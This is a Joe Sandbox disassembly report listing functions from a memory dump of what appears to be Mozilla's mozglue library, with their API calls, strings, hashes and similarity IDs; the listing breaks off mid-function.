Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: bab9a921b2db941f649d19ba83cea1f2c426f22f3eb5a88241d26960ebdfa2d5
Instruction ID: 5a51aad46e7618017a0a5dad08e710467d91c62202b3c6104c23169ecf2d6adf
Opcode Fuzzy Hash: bab9a921b2db941f649d19ba83cea1f2c426f22f3eb5a88241d26960ebdfa2d5
Instruction Fuzzy Hash: CE319171B04604CBCB00DFA9C8599AEB7F5FF9A325B250519D902A7780DB31F94ACB92

Function 6C969830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C9B7ABE), ref: 6C96985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C9B7ABE), ref: 6C9698A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C969909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C969918
free.MOZGLUE(?), ref: 6C969975

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: 4137d03381a025ad36ab9a787ded1573bf3e4c4ad511091d4a4daa24cf822f72
Instruction ID: 315f7fbe94da587da728d85a16304f4067f99594be10b55fb17a2c376845603a
Opcode Fuzzy Hash: 4137d03381a025ad36ab9a787ded1573bf3e4c4ad511091d4a4daa24cf822f72
Instruction Fuzzy Hash: C471AA746047068FD724CF29C480966BBF5FF4A3287254AADE85A8BF90D731F841CB91

Function 6C96B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C9ACC83,?,?,?,?,?,?,?,?,?,6C9ABCAE,?,?,6C99DC2C), ref: 6C96B7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C9ACC83,?,?,?,?,?,?,?,?,?,6C9ABCAE,?,?,6C99DC2C), ref: 6C96B80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C9ACC83,?,?,?,?,?,?,?,?,?,6C9ABCAE), ref: 6C96B88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C9ACC83,?,?,?,?,?,?,?,?,?,6C9ABCAE,?,?,6C99DC2C), ref: 6C96B896

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: 041c6b22a8d40372991466ac8ae860c2a7069c3b8c3ee84659335f43ccf86f9c
Instruction ID: 246f456b76d7412a1ea2c0a98076613406390562ee2cffc32c3731d00e4ffd17
Opcode Fuzzy Hash: 041c6b22a8d40372991466ac8ae860c2a7069c3b8c3ee84659335f43ccf86f9c
Instruction Fuzzy Hash: 3E519C757046008FDB24CF5AC484A2AB7F5FF89318B69859DE98A97B81D731EC01DB80

Function 6C9A1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9A1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C9A1BE3,?,?,6C9A1D96,00000000), ref: 6C9A1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C9A1BE3,?,?,6C9A1D96,00000000), ref: 6C9A1D4C
GetCurrentThreadId.KERNEL32 ref: 6C9A1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9A1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9A1DDA

Part of subcall function 6C9A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C9A1F03
Part of subcall function 6C9A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C9A1DF2,00000000,00000000), ref: 6C9A1F0C
Part of subcall function 6C9A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C9A1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C9A1DF4

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 434161ff008567d77c09c505c1b100bb3110490fdb6e46222be36b3a6b6c0cd2
Instruction ID: 069d8256c4beba576eed91c856fefd64cfa7b12fa5074811dcdac2462626f73d
Opcode Fuzzy Hash: 434161ff008567d77c09c505c1b100bb3110490fdb6e46222be36b3a6b6c0cd2
Instruction Fuzzy Hash: B54145B5204B01DFCB10DF69C488A56BBF9FB99714F20442EE95A87B41CB71F854CB91

Function 6C9638A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C9DE220,?,?,?,?,6C963899,?), ref: 6C9638B2
ReleaseSRWLockExclusive.KERNEL32(6C9DE220,?,?,?,6C963899,?), ref: 6C9638C3
free.MOZGLUE(00000000,?,00000000,0000002C,?,?,?,6C963899,?), ref: 6C9638F1
RtlFreeHeap.NTDLL ref: 6C963920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C963899,?), ref: 6C96392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C963899,?), ref: 6C963943
RtlFreeHeap.NTDLL ref: 6C96396E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 24adca4353828bea103a318e3c2a3e7c98cfdf66cd00006cec9ba144382acbcd
Instruction ID: f9de067691d91b87a0a44fd442d7e2c6e8e41b5543c4b44dbf52ae36c0791fc8
Opcode Fuzzy Hash: 24adca4353828bea103a318e3c2a3e7c98cfdf66cd00006cec9ba144382acbcd
Instruction Fuzzy Hash: C721BF72600A10DFE7209F26C880B96BBA9FF55328F258469D95A97F90C730E985CB91

Function 6C9984E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9984F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C99850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C99851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C99855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C99856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9985AC

Part of subcall function 6C997670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C99767F
Part of subcall function 6C997670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C997693
Part of subcall function 6C997670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9976A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9985B2

Part of subcall function 6C975E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C975EDB
Part of subcall function 6C975E90: memset.VCRUNTIME140(6C9B7765,000000E5,55CCCCCC), ref: 6C975F27
Part of subcall function 6C975E90: LeaveCriticalSection.KERNEL32(?), ref: 6C975FB2

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: cac8eff9d937dac9b919cd4761e3ea95aef2999215e0182770f09a00ee56c3fe
Instruction ID: b7c9933464b9c951249474b6a6b36f53743d4bbb47717c3bf412c8ba39d925c4
Opcode Fuzzy Hash: cac8eff9d937dac9b919cd4761e3ea95aef2999215e0182770f09a00ee56c3fe
Instruction Fuzzy Hash: 48218E742006019FDB18DB28C888A6AB7B9AF9430DF28492DE55BD3B41DB31F958CB56

Function 6C961640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C961699
VerSetConditionMask.NTDLL ref: 6C9616CB
VerSetConditionMask.NTDLL ref: 6C9616D7
VerSetConditionMask.NTDLL ref: 6C9616DE
VerSetConditionMask.NTDLL ref: 6C9616E5
VerSetConditionMask.NTDLL ref: 6C9616EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9616F9

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: 8f8a2cd46451d108828f2a413a0759199c5cf10e5333fb35fd7ac93a3b1621c1
Instruction ID: bba0b897be92b6e228a67421185f6b1bd8524806e54ce4ec3bb1d896e3242523
Opcode Fuzzy Hash: 8f8a2cd46451d108828f2a413a0759199c5cf10e5333fb35fd7ac93a3b1621c1
Instruction Fuzzy Hash: 9821D5B07442086BFB106A65CC45FBBB37CDF96704F044528F645AB6C0C674EE54C6A1

Function 6C99F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C99F598), ref: 6C99F621

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

GetCurrentThreadId.KERNEL32 ref: 6C99F637
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8,?,?,00000000,?,6C99F598), ref: 6C99F645
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8,?,?,00000000,?,6C99F598), ref: 6C99F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C99F62A

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 99e2e4a7255e96c9c32b5a1c0ac3f4d8398d7a213746abeb72b20cee0978f20d
Instruction ID: dbfb89039c02f222b4e8578100ebe23204c7e3c60010c0d8b7a0a5392eb98bc5
Opcode Fuzzy Hash: 99e2e4a7255e96c9c32b5a1c0ac3f4d8398d7a213746abeb72b20cee0978f20d
Instruction Fuzzy Hash: 0211E371209A05AFCB40AF58C8489A5B77DFF9635DB280015FA09A3F01CB71F861CBA1

Function 6C961FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C961FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C961FFD
__Init_thread_footer.LIBCMT ref: 6C962011
FreeLibrary.KERNEL32 ref: 6C962059

Strings

CoCreateInstance, xrefs: 6C961FF7
combase.dll, xrefs: 6C961FD9

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 3a34ae18cd0fd3d7efdd1a7d06b4178ed928b9b246e63cdec053077a44efb8a4
Instruction ID: a05e65fbecb88758537929cf5cc8fa50c83dc609a7091692d6ff7701b3159862
Opcode Fuzzy Hash: 3a34ae18cd0fd3d7efdd1a7d06b4178ed928b9b246e63cdec053077a44efb8a4
Instruction Fuzzy Hash: 29115175209A05EFEF10CF55C84EE667B79EB86359F208419F905A3A80C731F890DFA1

Function 6C960EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C98AB89: EnterCriticalSection.KERNEL32(6C9DE370,?,?,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284), ref: 6C98AB94
Part of subcall function 6C98AB89: LeaveCriticalSection.KERNEL32(6C9DE370,?,6C9534DE,6C9DF6CC,?,?,?,?,?,?,?,6C953284,?,?,6C9756F6), ref: 6C98ABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C98D9F0,00000000), ref: 6C960F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C960F3C
__Init_thread_footer.LIBCMT ref: 6C960F50
FreeLibrary.KERNEL32(?,6C98D9F0,00000000), ref: 6C960F86

Strings

CoInitializeEx, xrefs: 6C960F36
combase.dll, xrefs: 6C960F18

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: d57daf84c3f9b33a4cdf9cde6b74a579e95b91fccb7cd8b778d0dff63dff6da6
Instruction ID: db76d53b309ef7e029be97d9141d51536daebdb60b8c645d9d77956a38dafc03
Opcode Fuzzy Hash: d57daf84c3f9b33a4cdf9cde6b74a579e95b91fccb7cd8b778d0dff63dff6da6
Instruction Fuzzy Hash: EC110630719A419BEF00CF55C949A693778EB8B32AF208619E905B3B80DB30F480CA69

Function 6C99F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C99F561

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

GetCurrentThreadId.KERNEL32 ref: 6C99F577
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99F585
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C99F56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C99F3A8
[I %d/%d] profiler_resume, xrefs: 6C99F239
[I %d/%d] profiler_resume_sampling, xrefs: 6C99F499

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: e30c48d20f17c9ec6a6d5f07fc484cf4078869230fad77126673fd32d574df5b
Instruction ID: aa67c257549bbc056e8f111de936c12045696a46ba325a43ddb5548bf236ee4b
Opcode Fuzzy Hash: e30c48d20f17c9ec6a6d5f07fc484cf4078869230fad77126673fd32d574df5b
Instruction Fuzzy Hash: 27F0B475204A049FDB006F699C4C96A77BDEB9629EF294015FA09A3701CF31E84087B1

Function 6C99F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C99F598), ref: 6C99F621

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

GetCurrentThreadId.KERNEL32 ref: 6C99F637
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8,?,?,00000000,?,6C99F598), ref: 6C99F645
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8,?,?,00000000,?,6C99F598), ref: 6C99F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C99F62A

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 9a23326c18c620d3b4f5665758a1c7df30de0d042a0c62ae7b176801473360a7
Instruction ID: 8c8f31107bf0dabd3aea7ad4356660dd60110da7ec23acc7c525b99d64a93a69
Opcode Fuzzy Hash: 9a23326c18c620d3b4f5665758a1c7df30de0d042a0c62ae7b176801473360a7
Instruction Fuzzy Hash: 07F0B475204A04AFDF006F688C4C95A777DEB9625EF254015FA09A3701CB75E84587B1

Function 6C960E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C960DF8), ref: 6C960E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C960EA1
__Init_thread_footer.LIBCMT ref: 6C960EB5
FreeLibrary.KERNEL32 ref: 6C960EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C960E9B
kernel32.dll, xrefs: 6C960E7D

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 0bf903564c60863462c14bb70443c6a6c79dd39a2da2b3aacfdda3046ff6dad3
Instruction ID: 65fc3a797f989c6b03bbc0683c11bc91570c852e558421845a6d685752eb891e
Opcode Fuzzy Hash: 0bf903564c60863462c14bb70443c6a6c79dd39a2da2b3aacfdda3046ff6dad3
Instruction Fuzzy Hash: D9014B74708A828BEF018FE9CA96BC273B5E766B1DF205525D901A3F80DB74F484CA56

Function 6C9905F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C98CFAE,?,?,?,6C9531A7), ref: 6C9905FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C98CFAE,?,?,?,6C9531A7), ref: 6C990616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C9531A7), ref: 6C99061C
